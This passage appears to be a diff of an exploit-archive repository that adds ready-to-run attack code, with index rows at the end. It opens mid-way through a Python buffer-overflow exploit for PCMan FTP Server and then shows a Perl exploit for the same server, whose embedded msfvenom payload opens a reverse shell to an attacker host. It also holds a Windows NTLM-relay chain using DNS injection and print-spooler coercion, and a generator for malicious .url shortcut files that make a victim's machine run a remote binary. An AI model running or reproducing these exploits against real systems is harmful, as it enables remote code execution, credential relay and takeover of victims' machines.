shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
sploit = Cmd + JuNk + ret + NOP + shellcode
sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n"
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the FTP USER command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
net_sock.send(sploit)
sleep(1)
except:
print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
net_sock.close()
except:
print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
if __name__ == "__main__":
main()

72
exploits/windows/remote/52326.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
"\x17";
# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
my $sock = IO::Socket::INET->new(
PeerAddr => "192.168.176.131",
PeerPort => "21",
Proto => 'tcp',
) or die "Cannot connect to 192.168.176.131:21: $!\n";
my $offset = "A"x2007;
my $eip = "\xd9\x2f\xe3\x74";
my $nops = "\x90"x20;
my $payload = $offset . $eip . $nops . $buf;
my $r = <$sock>;
print $sock "USER anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "PASS anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "RMD $payload\r\n";
$r = <$sock>;
print $r;
sleep(1);
close($sock);

121
exploits/windows/remote/52330.py Executable file
View file

@ -0,0 +1,121 @@
#!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.
import argparse
import subprocess
import socket
import time
import sys
def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
cmd = [
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
]
try:
subprocess.run(cmd, check=True)
print("[+] DNS record successfully added.")
except subprocess.CalledProcessError:
print("[!] Failed to add DNS record. Check credentials and connectivity.")
sys.exit(1)
def check_record(record_name):
print("[*] Verifying DNS record propagation...")
for i in range(10):
try:
result = socket.gethostbyname_ex(record_name)
if result and result[2]:
print(f"[+] DNS record resolved to: {result[2]}")
return True
except socket.gaierror:
time.sleep(2)
print("[!] DNS record did not propagate or resolve.")
return False
def start_ntlmrelay(target):
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
try:
subprocess.Popen([
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
])
print("[*] NTLM relay server started.")
except Exception as e:
print(f"[!] Failed to start NTLM relay server: {e}")
sys.exit(1)
def trigger_coercion(victim_ip, fake_host):
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
cmd = [
"rpcping",
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
"-s", fake_host,
"-e", "1234",
"-a", "n",
"-u", "none",
"-p", "none"
]
try:
subprocess.run(cmd, check=True)
print("[+] Coercion RPC call sent successfully.")
except subprocess.CalledProcessError:
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
args = parser.parse_args()
record = "relaytrigger"
fqdn = f"{record}.{args.dc_fqdn}"
inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
if not check_record(fqdn):
print("[!] DNS verification failed, aborting.")
sys.exit(1)
start_ntlmrelay(args.target)
time.sleep(5) # Wait for relay server to be ready
trigger_coercion(args.victim_ip, fqdn)
print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
if __name__ == "__main__":
main()

62
exploits/windows/remote/52334.NA Normal file
View file

@ -0,0 +1,62 @@
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053
Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.
```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```
import argparse
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
with open(output_file, "w", encoding="utf-8") as f:
f.write(content)
print(f"[+] .url file created: {output_file}")
def main():
parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
parser.add_argument('--out', default="bait.url", help="Output .url file name")
parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
help="Target executable path on victim machine")
parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
help="Icon file path")
parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
args = parser.parse_args()
working_directory = fr"\\{args.ip}\{args.share}\\"
generate_url_file(
output_file=args.out,
url_target=args.exe,
working_directory=working_directory,
icon_file=args.icon,
icon_index=args.index,
modified=args.modified
)
if __name__ == "__main__":
main()

12
files_exploits.csv
View file

@ -5208,6 +5208,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,,
38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info
34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,,
52333,exploits/ios/remote/52333.py,"AirKeyboard iOS App 1.0.5 - Remote Input Injection",2025-06-15,"Chokri Hammedi",remote,ios,,2025-06-15,2025-06-15,0,CVE-n/a,,,,,
42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info
@ -10549,6 +10550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info
21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016
52329,exploits/multiple/local/52329.py,"Parrot and DJI variants Drone OSes - Kernel Panic Exploit",2025-06-15,"Mohammed Idrees Banyamer",local,multiple,,2025-06-15,2025-06-15,0,CVE-2025-37928,,,,,
16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip,
22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info
7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,,
@ -12386,6 +12388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,,
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
@ -14238,7 +14241,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
52327,exploits/php/webapps/52327.txt,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-06-15,/bin/neko,webapps,php,,2025-06-15,2025-06-15,0,CVE-2025-46041,,,,,
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@ -22953,6 +22956,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,,
52328,exploits/php/webapps/52328.py,"Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation",2025-06-15,"Milad karimi",webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-28000,,,,,
11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
@ -26362,6 +26366,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf
13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,,
11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,,
52331,exploits/php/webapps/52331.py,"PHP CGI Module 8.3.4 - Remote Code Execution (RCE)",2025-06-15,İbrahimsql,webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-4577,,,,,
14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip,
34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info
18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,,
@ -41052,6 +41057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,,
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
@ -45191,9 +45197,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z,
40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z,
40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
52326,exploits/windows/remote/52326.txt,"PCMan FTP Server 2.0.7 - Buffer Overflow",2025-06-15,"Fernando Mengali",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-4255,,,,,
38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@ -45908,6 +45914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
